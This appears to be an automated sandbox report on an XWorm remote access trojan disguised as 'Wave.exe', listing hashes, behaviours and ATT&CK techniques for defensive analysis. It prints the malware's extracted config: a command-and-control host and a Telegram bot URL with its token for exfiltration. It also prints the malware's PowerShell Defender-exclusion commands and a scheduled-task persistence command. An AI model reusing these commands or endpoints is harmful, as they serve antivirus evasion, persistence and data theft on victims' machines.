xworm | 1297e636f5bcea89e6fc45a6dd05d0464451cc1dca7b423fd652e932dc6408e4

Analysis

max time kernel
124s
max time network
127s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 08:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Wave.exe
Size

7.3MB
MD5

92d883d4d144e110b1997924c390e11e
SHA1

c42ab515f865b429016fc16faecf0415d5004e29
SHA256

1297e636f5bcea89e6fc45a6dd05d0464451cc1dca7b423fd652e932dc6408e4
SHA512

c73352005a8034e9f0d044ebb7c9e4a0f97bee99fa0e9c6503ca70743232e1998b52846a0761c6fdab58c29554666e7122660b9da829210f3bb83f32f04981d9
SSDEEP

196608:V4FB96c/z3etLp+v2gwdP2gzmEWSyRy/16aGb3:VM8k3e1xdFqCm2a3

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

courses-disney.gl.at.ply.gg:21335

127.0.0.1:21335

Attributes

Install_directory
%AppData%
install_file
svchost.exe
telegram
https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage?chat_id=809478226

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x00090000000141c0-2.dat	family_xworm
behavioral1/memory/3000-19-0x0000000000A40000-0x0000000000A5C000-memory.dmp	family_xworm
behavioral1/memory/1876-104-0x0000000001300000-0x000000000131C000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1092	powershell.exe
948	powershell.exe
1460	powershell.exe
1688	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Wave1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Wave1.exe

Executes dropped EXE 6 IoCs

pid	Process
3000	Wave1.exe
3056	Wave2.exe
2600	Wave3.exe
2760	test.exe
1876	svchost.exe
1612	svchost.exe

Loads dropped DLL 6 IoCs

pid	Process
2912	Wave.exe
2912	Wave.exe
2912	Wave.exe
2912	Wave.exe
2600	Wave3.exe
2760	test.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	Wave1.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1232	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
948	powershell.exe
1460	powershell.exe
1688	powershell.exe
1092	powershell.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe
3000	Wave1.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3000	Wave1.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	3000	Wave1.exe
Token: SeDebugPrivilege	1876	svchost.exe
Token: SeDebugPrivilege	1612	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3000	Wave1.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2912 wrote to memory of 3000	2912	Wave.exe	28
PID 2912 wrote to memory of 3000	2912	Wave.exe	28
PID 2912 wrote to memory of 3000	2912	Wave.exe	28
PID 2912 wrote to memory of 3000	2912	Wave.exe	28
PID 2912 wrote to memory of 3056	2912	Wave.exe	29
PID 2912 wrote to memory of 3056	2912	Wave.exe	29
PID 2912 wrote to memory of 3056	2912	Wave.exe	29
PID 2912 wrote to memory of 3056	2912	Wave.exe	29
PID 2912 wrote to memory of 2600	2912	Wave.exe	31
PID 2912 wrote to memory of 2600	2912	Wave.exe	31
PID 2912 wrote to memory of 2600	2912	Wave.exe	31
PID 2912 wrote to memory of 2600	2912	Wave.exe	31
PID 2600 wrote to memory of 2760	2600	Wave3.exe	32
PID 2600 wrote to memory of 2760	2600	Wave3.exe	32
PID 2600 wrote to memory of 2760	2600	Wave3.exe	32
PID 3000 wrote to memory of 948	3000	Wave1.exe	34
PID 3000 wrote to memory of 948	3000	Wave1.exe	34
PID 3000 wrote to memory of 948	3000	Wave1.exe	34
PID 3000 wrote to memory of 1460	3000	Wave1.exe	36
PID 3000 wrote to memory of 1460	3000	Wave1.exe	36
PID 3000 wrote to memory of 1460	3000	Wave1.exe	36
PID 3000 wrote to memory of 1688	3000	Wave1.exe	38
PID 3000 wrote to memory of 1688	3000	Wave1.exe	38
PID 3000 wrote to memory of 1688	3000	Wave1.exe	38
PID 3000 wrote to memory of 1092	3000	Wave1.exe	40
PID 3000 wrote to memory of 1092	3000	Wave1.exe	40
PID 3000 wrote to memory of 1092	3000	Wave1.exe	40
PID 3000 wrote to memory of 1232	3000	Wave1.exe	42
PID 3000 wrote to memory of 1232	3000	Wave1.exe	42
PID 3000 wrote to memory of 1232	3000	Wave1.exe	42
PID 1816 wrote to memory of 1876	1816	taskeng.exe	47
PID 1816 wrote to memory of 1876	1816	taskeng.exe	47
PID 1816 wrote to memory of 1876	1816	taskeng.exe	47
PID 1816 wrote to memory of 1612	1816	taskeng.exe	48
PID 1816 wrote to memory of 1612	1816	taskeng.exe	48
PID 1816 wrote to memory of 1612	1816	taskeng.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Wave.exe
"C:\Users\Admin\AppData\Local\Temp\Wave.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2912
- C:\Users\Admin\AppData\Local\Temp\Wave1.exe
  "C:\Users\Admin\AppData\Local\Temp\Wave1.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Wave1.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave1.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1232
- C:\Users\Admin\AppData\Local\Temp\Wave2.exe
  "C:\Users\Admin\AppData\Local\Temp\Wave2.exe"
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\Users\Admin\AppData\Local\Temp\Wave3.exe
  "C:\Users\Admin\AppData\Local\Temp\Wave3.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Users\Admin\AppData\Local\Temp\onefile_2600_133642953067610000\test.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2760

C:\Windows\system32\taskeng.exe
taskeng.exe {AC95DA9F-A1AD-49DA-AAEF-4C04510AFC61} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\onefile_2600_133642953067610000\python311.dll

Filesize
5.5MB

MD5
1fe47c83669491bf38a949253d7d960f

SHA1
de5cc181c0e26cbcb31309fe00d9f2f5264d2b25

SHA256
0a9f2c98f36ba8974a944127b5b7e90e638010e472f2eb6598fc55b1bda9e7ae

SHA512
05cc6f00db128fbca02a14f60f86c049855f429013f65d91e14ea292d468bf9bfdeebc00ec2d54a9fb5715743a57ae3ab48a95037016240c02aabe4bfa1a2ff4

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_2600_133642953067610000\test.exe

Filesize
8.4MB

MD5
d7802e5bf9fc7cdf60cea7139a6aea54

SHA1
40eb6df5d8eb5f3269bf89df8e055a534a730971

SHA256
455a15507bf33290a3192b2602c17b60ffe215a43ffe9924f92624b00946e896

SHA512
267b2bae1c3ed4c85e4e4ae3144e0f5a9f2fd9c51b2f8cf7c5501ebf3c84aa2952a5264ad3151238a6796a106e62d36418809938b51919b4644606b8ad684328

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
51e517e325e3c79e25c197bd70a3eec6

SHA1
6dcebc68498b0a454f00f7f3bd8c4f0baf5d3d9a

SHA256
4848abd877baa5f4d93d2520a3f371911ae64328679fd124309f90e12a13d277

SHA512
f2f9aae8ae8f4f1d5e9db79f7ee8c0c2c6c8e7a93615ad045a513ed410ef2d01d8c51c7f3a78a1b3235786a6a1d89230f34863119f532fcc34b9076033bd97cc

Download Submit
\Users\Admin\AppData\Local\Temp\Wave1.exe

Filesize
83KB

MD5
2bebcc27d5c495d9b776162968f42b07

SHA1
bfa471133b6a8b74b35fa054e62871c6ce05f873

SHA256
dcf95d14fbf8ed9cef6cf7be3e71a753d5334c1be5deaba771d8354f5bd0f5e6

SHA512
f6223ebb6ef6b1a4ded6c742ace5d93ea18dece22ff1f18c69003594e0274edd4ff4998fbb6890bdc98b5e3ce5fc08b2ce9aced270017449122f2d7733bba1cc

Download Submit
\Users\Admin\AppData\Local\Temp\Wave2.exe

Filesize
5KB

MD5
3eafa2fae18c03659154c5f25820776f

SHA1
79b86a02bdbb51014a3075efddd2b7568d766773

SHA256
66e674645d89818a2aeaad30a0e551ba3e290ef4fd2c7dd5f589e471806b6d59

SHA512
d5de994692893d52e656e6e95ef69785a387473411da95c01b87fd65a85201ca4850ed71696f5c1475574ce8e5cf94caf380fe065812596b51933558e585acdb

Download Submit
\Users\Admin\AppData\Local\Temp\Wave3.exe

Filesize
7.0MB

MD5
1d26687c7641f34244cf49e5ff5e954a

SHA1
af5b96231f35f612199bf05955500607efdae540

SHA256
7b9e1ae4a057ef5edd8b806e4c6b0e45db5f1135e81690b6920f4eb88d7c86d7

SHA512
16dd8816e5f2885ae36234e75f755c9a167e18f876fa8d31299cace4426e610947896bbe1e7045430ec4d500e9162879a60ad879e6cc837660e2ba2e4f809521

Download Submit
memory/948-76-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/948-77-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/1460-84-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/1460-85-0x0000000002230000-0x0000000002238000-memory.dmp

Filesize
32KB

Download
memory/1876-104-0x0000000001300000-0x000000000131C000-memory.dmp

Filesize
112KB

Download
memory/2912-21-0x0000000000400000-0x0000000000B54000-memory.dmp

Filesize
7.3MB

Download
memory/3000-19-0x0000000000A40000-0x0000000000A5C000-memory.dmp

Filesize
112KB

Download
memory/3056-36-0x0000000001350000-0x0000000001358000-memory.dmp

Filesize
32KB

Download